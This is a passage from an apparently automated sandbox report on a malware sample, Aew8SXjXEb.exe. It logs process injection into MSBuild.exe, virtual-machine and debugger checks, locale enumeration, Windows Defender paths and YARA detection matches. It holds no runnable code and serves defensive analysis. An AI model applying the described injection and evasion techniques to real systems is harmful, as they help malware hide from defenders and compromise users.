Source: Amcache.hve.6.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.6.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW@ |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00627922 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
1_2_0041C03D |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00622003 mov edi, dword ptr fs:[00000030h] |
0_2_00622003 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063A64C mov eax, dword ptr fs:[00000030h] |
0_2_0063A64C |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00666628 mov eax, dword ptr fs:[00000030h] |
0_2_00666628 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00630F2E mov ecx, dword ptr fs:[00000030h] |
0_2_00630F2E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_00419750 mov eax, dword ptr fs:[00000030h] |
1_2_00419750 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_00627610 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_00627922 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_0062DA73 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627AAF SetUnhandledExceptionFilter, |
0_2_00627AAF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
1_2_0041AD48 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041CEEA SetUnhandledExceptionFilter, |
1_2_0041CEEA |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
1_2_0041B33A |
Source: Yara match |
File source: Process Memory Space: Aew8SXjXEb.exe PID: 6032, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EF7008 |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetACP,IsValidCodePage,GetLocaleInfoW, |
0_2_0063C085 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW, |
0_2_0063622B |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_0063C372 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_0063C327 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_0063C40D |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
0_2_0063C498 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW, |
0_2_0063C6EB |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
0_2_0063C814 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetLocaleInfoW, |
0_2_0063C91A |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
0_2_0063C9E9 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: EnumSystemLocalesW, |
0_2_00635D7F |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00627815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
0_2_00627815 |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe |
Source: Amcache.hve.6.dr |
Binary or memory string: MsMpEng.exe |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR |
Source: Yara match |
File source: dump.pcap, type: PCAP |